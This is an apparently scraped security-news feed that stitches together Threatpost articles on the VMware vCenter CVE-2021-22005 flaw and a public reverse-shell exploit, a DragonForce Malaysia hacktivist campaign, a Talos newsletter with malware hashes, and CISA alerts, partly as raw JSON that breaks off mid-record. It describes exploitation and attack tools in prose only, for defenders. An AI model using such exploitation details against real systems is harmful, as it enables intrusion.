This is a ransomware-friendly bug. VMware pointed to the [all-too-real threat](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>) of spiraling ransomware attacks: a growing risk that makes the “safest stance” the assumption that threat actors have already seized control of a desktop and a user account via [phishing](<https://threatpost.com/hackers-deep-sea-phishing/174868/>) or [spearphishing](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attacks, it said.

If a phishing attack has compromised one or more accounts, it means that the attacker “may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,” VMware stressed.

This patch is considered an “emergency change” for organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types, the company said. An emergency change is one that must be introduced ASAP: for example, to resolve a major incident or implement a security patch.

Granted, the decision on how to proceed is up to individual organizations, all of which have different environments, tolerance for risk, security controls and risk mitigation strategies. “The decision on how to proceed is up to you,” VMware said, but still, given the severity, the company strongly recommends that users act.

## The Other 18 Flaws Are Still Attacker Candy

The other security issues addressed in Tuesday’s update have lower CVSS scores, but they’re still ripe for the plucking by any attacker that’s already compromised organizations’ networks. That’s one of the “biggest problems facing IT today,” Plankers wrote: the fact that cyberattackers can persist on a compromised network, “patiently and quietly” biding their time to eventually move laterally as they use compromised accounts to break into other systems over long periods of time.

“They steal confidential data, intellectual property, and at the end install ransomware and extort payments from their victims,” Plankers explained. “Less urgent security vulnerabilities can still be potential tools in the hands of attackers, so VMware always recommends patching to remove them.”

## How to CYA (Cover Your Assets)?

If possible, the quickest way to resolve these serious issues is to patch vCenter Server. If that’s not possible, VMware has workarounds, but only for the critical vulnerability, CVE-2021-22005. The workaround is listed in the [response matrix](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) at the bottom of VMware’s Security Advisory (VMSA), VMSA-2021-0020.

The workaround involves editing a text file on the VCSA and restarting services.

Still, if possible, patching should be the first choice for a few reasons, Plankers advised:

> First, if you can patch vCenter Server, do it. In general, this is the fastest way to resolve this problem, doesn’t involve editing files on the vCenter Server Appliance (VCSA), and removes the vulnerabilities completely. Patching also carries less technical debt and less risk than using a workaround. —Bob Plankers

Other security controls that can help to protect users’ networks until they can patch include using network perimeter access controls or the vCenter Server Appliance firewall to curtail access to the vCenter Server management interfaces. “We always strongly suggest limiting access to vCenter Server, ESXi, and vSphere management interfaces to only vSphere Admins,” Plankers said. “Drive all other workload management activity through the VM network connections. This simplifies access control and makes the RDP or ssh management traffic subject to other security controls, such as IDS/IPS and monitoring.”

## More Resources

VMware offered this list of resources:

 * [Tips for Patching VMware vSphere](<https://core.vmware.com/tips-patching-vmware-vsphere>) (practical advice for ensuring patching success)
 * [VMware vSphere Security Configuration Guide](<https://core.vmware.com/security-configuration-guide>) (baseline security best practices for vSphere)
 * [VMware Ransomware Resource Center](<https://core.vmware.com/ransomware>) (discussion around tactics to help prevent, deter, and recover from attacks)
 * [VMware Ports & Protocols Firewalling Guidance](<https://ports.vmware.com/>) (ports.vmware.com)
 * [VMware Security Advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) (descriptions of the issues and workarounds)
 * [VMware Communities Forum Thread on VMSA-2021-0020](<https://via.vmw.com/vmsa-2021-0020-community>) (a great place to ask questions)
 * [VMSA-2021-0020: Questions & Answers](<https://via.vmw.com/vmsa-2021-0020-faq>) (questions VMware has received about this issue)
 * [VMSA-2021-0020: What You Need to Know](<https://via.vmw.com/vmsa-2021-0020-blog>) (Plankers’ blog post)

## Can’t Patch What You Don’t Know Is There

Greg Fitzgerald, co-founder of the cybersecurity firm Sevco Security, noted that vulnerabilities such as this one point to the need to go far beyond patching this vCenter bug. “It’s critical for enterprises to take the first step of patching this vCenter vulnerability, but it can’t stop there,” he told Threatpost on Wednesday.

Beyond patching the initial vulnerability ASAP, enterprises would be well-advised to know what IT assets they have.
Even the most fastidious approach to patch management “cannot ensure that all enterprise assets are accounted for,” he said via email. “You can’t patch something if you don’t know it’s there, and attackers have figured out that the easiest path to accessing your network and your data is often through unknown or abandoned IT assets.”

Source record: Threatpost, “VMware Warns of Ransomware-Friendly Bug in vCenter Server”, published 2021-09-22T16:17:33; CVE list: CVE-2021-22005; https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/

A fully working exploit for the critical CVE-2021-22005 remote code-execution (RCE) vulnerability in VMware vCenter is now public and being exploited in the wild.

Released on Monday by Rapid7 security engineer William Vu (who goes by the Twitter handle [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>)), this one’s different from the incomplete proof-of-concept (PoC) exploit that began making the rounds on Friday. This variant can be used to open a reverse shell on a vulnerable server, allowing remote attackers to execute arbitrary code.

The vulnerability can be exploited by unauthenticated, remote users and allows attackers to upload a file to the vCenter Server analytics service.

## UPDATE: Indicators of Exploit

UPDATE (09/28/21, 16:21): The attack team at the attack surface management firm Randori also has a working RCE exploit for CVE-2021-22005.
Zero-day finder Aaron Portnoy detailed the exploit in his [attack notes](<https://www.randori.com/blog/technical-analysis-vcenter-vmsa-2021-0020/>), which also include detection methods and indicators of exploit that defenders can use to determine whether or not they’ve been exploited by this bug.

Randori confirmed what VMware, CISA and everybody else is saying: namely, that these vulnerabilities “are very serious issues,” and that affected organizations “should take immediate action to ensure the security of impacted devices.” As it is, Portnoy said, CISA has predicted a high likelihood that foreign actors will move quickly to exploit the vulnerability.

Portnoy also reiterated what VMware has already stressed: to wit, users should just assume that they’re already infected. “Organizations that have or had affected vCenter versions exposed to the Internet, since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,” he wrote.

Below is Vu’s unredacted RCE proof-of-concept exploit against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled. Through [CEIP](<https://www.vmware.com/solutions/trustvmware/ceip.html>), VMware collects technical information about customers’ use of its products. The CEIP is toggled [on as a default](<https://docs.vmware.com/en/VMware-Cloud-Foundation/4.0/com.vmware.vcf.vxrail.admin.doc/GUID-2B70F601-7D01-4609-AB1A-870A20485B67.html#:~:text=The%20Join%20the%20VMware%20Customer,Click%20Apply.>) setting in VMware Cloud Foundation.

Unredacted RCE PoC against VMware’s CEIP. Source: [wvu](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1>).

Not that configurations matter with this vulnerability, VMware said last week. “This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,” said Bob Plankers, technical marketing architect at VMware, when VMware [announced](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) the vulnerability on Tuesday.

CERT/CC vulnerability analyst [Will Dormann](<https://twitter.com/wdormann>) noted that a redacted PoC that Vu listed at the start of a thread that began on Friday didn’t require CEIP to be enabled. “Unclear if THAT one is being used in the wild now,” Dormann said.

According to Vu’s [technical analysis](<https://www.bleepingcomputer.com/news/security/working-exploit-released-for-vmware-vcenter-cve-2021-22005-bug/>), the full, unredacted PoC starts with a request to create a directory for path traversal and schedules the spawn of a reverse shell.

## History of a Bad Bug

[VMware announced](<https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/>) CVE-2021-22005 a week ago, on Sept. 21, as part of a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that included patches for 19 CVE-numbered vulnerabilities that affect the company’s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.

They were all serious, but CVE-2021-22005 – a critical arbitrary file upload vulnerability in the Analytics service – was assigned a CVSSv3 base score of 9.8 out of a maximum severity rating of 10. VMware urged users to declare an “emergency change” per [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types and to patch as soon as possible.

Also, on Friday, the Cybersecurity and Infrastructure Security Agency [(CISA) warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that VMware had confirmed that threat actors were exploiting the bug and that security researchers were reporting mass scanning for vulnerable vCenter servers and publicly available exploit code.
CISA urged users with vulnerable systems to prioritize updating or to apply VMware’s [workaround](<https://kb.vmware.com/s/article/85717>).

“Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,” the advisory stated.

## Know What Assets Need to Be Patched

In addition to prioritizing patching, it’s important to know about all the assets that need to be patched, according to Greg Fitzgerald, co-founder of the cybersecurity firm Sevco Security.

“We’ve found that the vast majority of enterprises have robust patch management tools that are extremely effective at what they’re designed to do: Applying patches to assets that security and IT teams know about,” he told Threatpost via email on Tuesday.

He continued: “Companies are not getting breached because their patch management tools aren’t good enough. They’re getting breached because it’s impossible to patch an asset you don’t know is there in the first place. Maintaining an accurate IT asset inventory in a dynamic environment is really hard to do. Threat actors figured that out a long time ago and work around the clock to exploit it. The first step to combating threats like this one is to establish a continuously updated, accurate inventory of all enterprise assets to serve as a foundational control for your security program.”

Source record: Threatpost, “Working PoC Is Out for VMware vCenter CVE-2021-22005 Flaw”, published 2021-09-28T15:06:20; CVE list: CVE-2021-22005; CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P); https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/

According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, “with the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.” In addition to DDoS, their targeted campaign – dubbed “OpsPatuk” – involves advanced threat actors “leveraging current exploits, breaching networks and leaking data.”

DragonForce Malaysia – best known for their hacktivism in support of the Palestinian cause – have turned their attention on India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.

According to the advisory, OpsPatuk remains ongoing today.

## The Casus Belli

In a televised debate last month, Nupur Sharma – a spokesperson for the Hindu nationalist
Bharatiya Janata Party (BJP) \u2013 made controversial remarks regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, widespread protests, and the ousting of Sharma herself from BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. __We Are DragonForce Malaysia. __This is a special operation on the insult of our Prophet Muhammad S.A.W. __India Government website hacked by DragonForce Malaysia. We will never remain silent. __Come Join This Operation ! __#OpsPatuk Engaged_\n\n\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that the group has used DDoS to perform \u201cnumerous defacements across India,\u201d pasting their logo and messaging to targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. 
Their favorite target has been Israel, having launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 against the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like Anonymous and the Low Orbit Ion Cannon, DragonForce weaponizes their own open source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more \u2013 in choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraging publicly disclosed vulnerabilities. In OpsPatuk, for example, they\u2019ve been working with the recently discovered [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. 
With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce Gang Unleash Hacks Against Govt. of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2022-08-04T19:59:46", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n_By Jon Munshaw. 
_\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nAfter what seems like forever and honestly has been a really long time, we\u2019re heading back to BlackHat in-person this year. We\u2019re excited to see a lot of old friends again to commiserate, hang out, trade stories and generally talk about security. \n\n \n\n\nThroughout the two days of the main conference, we\u2019ll have a full suite of flash talks at the Cisco Secure booth and several sponsored talks. Since this is the last edition of the newsletter before BlackHat starts, it\u2019s probably worthwhile running through all the cool stuff we\u2019ll have going on at Hacker Summer Camp. \n\n \n\n\nOur [booth should be easy enough to find](<https://www.expocad.com/host/fx/ubm/22bhusa/exfx.html>) \u2014 it\u2019s right by the main entrance to Bayside B. If you get to the Trellix Lounge, you\u2019ve gone too far north. Our researchers will be there to answer any questions you have and present on a wide variety of security topics, from research into Adobe vulnerabilities to the privacy effects of the overturn of Roe vs. Wade. Attendees who watch a lightning talk can grab a never-before-seen [Snort 3](<https://snort.org/snort3>)-themed Snorty and our malware mascot stickers, which were a [big hit at Cisco Live this year](<https://twitter.com/TalosSecurity/status/1536821931097305088>). \n\n \n\n\nWe\u2019ll also be over at the Career Center if you want to [come work with us](<https://talosintelligence.com/careers>). Or even if you don\u2019t, word on the street is there\u2019ll be silver and gold Snortys there. And on Thursday the 11th between 10 a.m. and noon local time a Talos hiring manager will be on site reviewing resumes and taking questions. \n\n \n\n\nIf you want more in-depth talks, we\u2019ll have five sponsored sessions between the 10th and 11th. 
If you want the latest schedule and location on those talks, be sure to [follow us on Twitter](<https://twitter.com/TalosSecurity>) or check out Cisco\u2019s BlackHat event page [here](<https://www.cisco.com/c/en/us/products/security/black-hat-usa.html>). Our sponsored talks cover Talos\u2019 latest work in Ukraine, the growing threat of business email compromise and current trends from state-sponsored actors. Make sure to catch all five of them. \n\n \n\n\nAnd if you liked our speakeasy at Cisco Live, you'll love the next secret we have in store at the BlackHat booth. Swing by and ask us about it. \n\n \n\n\nFor anyone sticking around for DEF CON, we\u2019ll also have a presence there with Blue Team Village. Drop any questions in the [Blue Team Village Discord](<https://www.blueteamvillage.org/>) for us, and be sure to attend the BTV Pool Party on Aug. 12 from 8 \u2013 11 p.m. local time. \n\n \n\n\nTo stay up to date on all things Talos at both conferences, be sure to follow us on social media. - \n\n\n \n\n## The one big thing \n\n> \n\n\nCisco Talos recently discovered [a new attack framework called \"Manjusaka\"](<https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html>) being used in the wild that could be the next evolution of Cobalt Strike \u2014 and is even advertised as so. This framework is advertised as an imitation of the Cobalt Strike framework. Although we haven't observed widespread usage of this framework in the wild, it has the potential to be adopted by threat actors all over the world. \n\n\n> ### Why do I care? \n> \n> Our researchers discovered a fully functional version of the command and control (C2), written in GoLang with a User Interface in Simplified Chinese, that\u2019s freely available and can generate new implants with custom configurations with ease. This increases the likelihood of wider adoption of this framework by malicious actors. 
If you\u2019re a defender of any kind, you want to stay up on the latest tools attackers are likely to use. And since Cobalt Strike is already one of the most widely used out there, it\u2019s safe to assume any evolution of it is going to draw some interest. \n> \n> ### So now what? \n> \n> Organizations must be diligent against such easily available tools and frameworks that can be misused by a variety of threat actors. In-depth defense strategies based on a risk analysis approach can deliver the best results in the prevention of this framework. Talos also released Snort rule 60275 and ClamAV signature Win.Trojan.Manjusaka-9956281-1 to detect the use of Manjusaka. \n\n> \n> \n\n## Other news of note\n\n \n\n\nEverything from convenience stores to government websites in Taiwan saw an uptick in cyber attacks this week after U.S. House Speaker Nancy Pelosi visited the country this week. She was the U.S.\u2019 highest-ranking official to visit there in more than 20 years. However, many of the attacks appeared to be from low-skilled attackers and some could even be attributed to a normal uptick in traffic from a busy news day. China could still retaliate for the visit with a cyber attack against Taiwan or the U.S., as the Chinese government has voiced its displeasure over Pelosi\u2019s actions and launched several kinetic warfare exercises. ([Reuters](<https://www.reuters.com/technology/7-11s-train-stations-cyber-attacks-plague-taiwan-over-pelosi-visit-2022-08-04/>), [Washington Post](<https://www.washingtonpost.com/politics/2022/08/03/those-pelosi-inspired-cyberattacks-taiwan-probably-werent-all-they-were-cracked-up-be/>)) \n\nThe U.S. Cybersecurity and Infrastructure Security Agency is warning that attackers are actively exploiting a critical vulnerability in Atlassian Confluence disclosed last week. CISA added CVE-2022-26138, a hardcoded password vulnerability in the Questions for Confluence app, to its list of Known Exploited Vulnerabilities on Friday. 
Adversaries can exploit this vulnerability to gain total access to data in on-premises Confluence Server and Confluence Data Center platforms. U.S. federal agencies have three weeks to patch for the issue under CISA\u2019s new guidance. ([Dark Reading](<https://www.darkreading.com/cloud/patch-now-atlassian-confluence-bug-active-exploit>), [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-confluence-bug-exploited-in-attacks/>)) \n\nNorth Korean state-sponsored actors continue to be active, recently adding a new Gmail attack to its arsenal. The infamous SharpTongue group uses the SHARPEXT malware to target organizations in the U.S., Europe and South Korea that work on nuclear weapons and other topics that North Korea sees as relevant to its national security. SHARPEXT installs a Google Chrome extension that allows the attackers to bypass users\u2019 Gmail multi-factor authentication and passwords, eventually entering the inbox and reading and downloading email and attachments. Other North Korean actors continue to use fake LinkedIn applications to apply for remote jobs, hoping to eventually steal cryptocurrency and fund the country\u2019s weapons program. ([Ars Technica](<https://arstechnica.com/information-technology/2022/08/north-korea-backed-hackers-have-a-clever-way-to-read-your-gmail/>), [Bloomberg](<https://www.bloomberg.com/news/articles/2022-08-01/north-koreans-suspected-of-using-fake-resumes-to-steal-crypto>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * _[Talos Takes Ep. #106: The top attacker trends from the past quarter](<https://talosintelligence.com/podcasts/shows/talos_takes/episodes/106>)_\n * _[Beers with Talos Ep. 
#124: There's no such thing as \"I have nothing to hide\"](<https://talosintelligence.com/podcasts/shows/beers_with_talos/episodes/124>)_\n * _[BlackHat \u2014 A poem](<https://blog.talosintelligence.com/2022/08/poems-0xCCd.html>)_\n * _[Vulnerability Spotlight: Vulnerabilities in Alyac antivirus program could stop virus scanning, cause code execution](<https://blog.talosintelligence.com/2022/05/vuln-spotlight-alyac-est.html>)_\n * _[Vulnerability Spotlight: How misusing properly serialized data opened TCL LinkHub Mesh Wi-Fi system to 17 vulnerabilities](<https://blog.talosintelligence.com/2022/08/vulnerability-spotlight-how-misusing.html>)_\n * _[Researcher Spotlight: You should have been listening to Lurene Grenier years ago](<https://blog.talosintelligence.com/2022/08/researcher-spotlight-you-should-have.html>)_\n * _[Manjusaka, a new attack tool similar to Sliver and Cobalt Strike](<https://securityaffairs.co/wordpress/133953/hacking/manjusaka-attack-tool.html>)_\n\n \n\n\n## Upcoming events where you can find Talos \n\n#### \n\n\n[**BlackHat**](<https://www.blackhat.com/us-22/>) **U.S.A 2022 **(Aug. 6 - 11, 2022) \nLas Vegas, Nevada \n\n \n\n\n_[USENIX Security '22](<https://www.usenix.org/conference/usenixsecurity22#registration>) _**(Aug. 10 - 12, 2022)** \nLas Vegas, Nevada \n\n \n\n\n**[DEF CON U.S.](<https://defcon.org/>) **(Aug. 11 - 14, 2022) \nLas Vegas, Nevada \n\n \n\n\n**[Security Insights 101 Knowledge Series](<https://aavar.org/securityinsights101/>) (Aug. 
25, 2022)**\n\nVirtual \n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>) ** **\n\n**MD5: **2c8ea737a232fd03ab80db672d50a17a \n\n**Typical Filename:** LwssPlayer.scr \n\n**Claimed Product: **\u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n\n**Detection Name: **Auto.125E12.241442.in02 \n\n \n\n\n**SHA 256:** [f21b040f7c47d8d3d9c1f0ef00f09e69f2c3f0e19d91988efc0ddd4833ced121](<https://www.virustotal.com/gui/file/f21b040f7c47d8d3d9c1f0ef00f09e69f2c3f0e19d91988efc0ddd4833ced121/details>) \n\n**MD5:** 9066dff68c1d66a6d5f9f2904359876c \n\n**Typical Filename:** dota-15_id3622928ids1s.exe \n\n**Claimed Product:** N/A \n\n**Detection Name:** W32.F21B040F7C.in12.Talos \n\n \n\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>) ** **\n\n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n\n**Typical Filename: **AAct.exe ** **\n\n**Claimed Product:** N/A ** **\n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201** **\n\n** \n**\n\n**SHA 256: **[168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0](<https://www.virustotal.com/gui/file/168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0/details>) \n\n**MD5: **311d64e4892f75019ee257b8377c723e \n\n**Typical Filename: **ultrasurf-21-32.exe ** 
**\n\n**Claimed Product: **N/A \n\n**Detection Name: **W32.DFC.MalParent", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Aug. 4, 2022) \u2014 BlackHat 2022 preview", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-04T18:00:00", "id": "TALOSBLOG:1CC8B88D18FD4407B2AEF8B648A80C27", "href": "http://blog.talosintelligence.com/2022/08/threat-source-newsletter-aug-4-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa": [{"lastseen": "2022-08-05T13:56:42", "description": "Atlassian has released a security advisory to address a vulnerability (CVE-2022-26138) affecting Questions for Confluence App. An attacker could exploit this vulnerability to obtain sensitive information. Atlassian reports that the vulnerability is likely to be exploited in the wild.\n\nCISA encourages users and administrators to review Atlassian\u2019s security advisory, [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), and apply the necessary updates immediately. 
\n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/07/22/atlassian-releases-security-advisory-questions-confluence-app-cve>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Questions for Confluence App, CVE-2022-26138", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-22T00:00:00", "id": "CISA:B99FA8E68B4D7FF5BA1F6693AC9C7CCF", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/07/22/atlassian-releases-security-advisory-questions-confluence-app-cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-26T18:14:34", "description": "On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server.\n\nOn September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. 
Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability.\n\nTo mitigate CVE-2021-22005, CISA strongly urges critical infrastructure entities and other organizations with affected vCenter Server versions to take the following actions.\n\n * Upgrade to a fixed version as quickly as possible. See VMware Security Advisory [VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) for patching information.\n * Apply the temporary workaround provided by VMware, if unable to upgrade to a fixed version immediately. See VMware\u2019s [workaround instructions for CVE-2021-22005,](<https://kb.vmware.com/s/article/85717>) [supplemental blog post,](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) and [frequently asked questions](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) for additional information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cisa", "title": "VMware vCenter Server Vulnerability CVE-2021-22005 Under Active Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
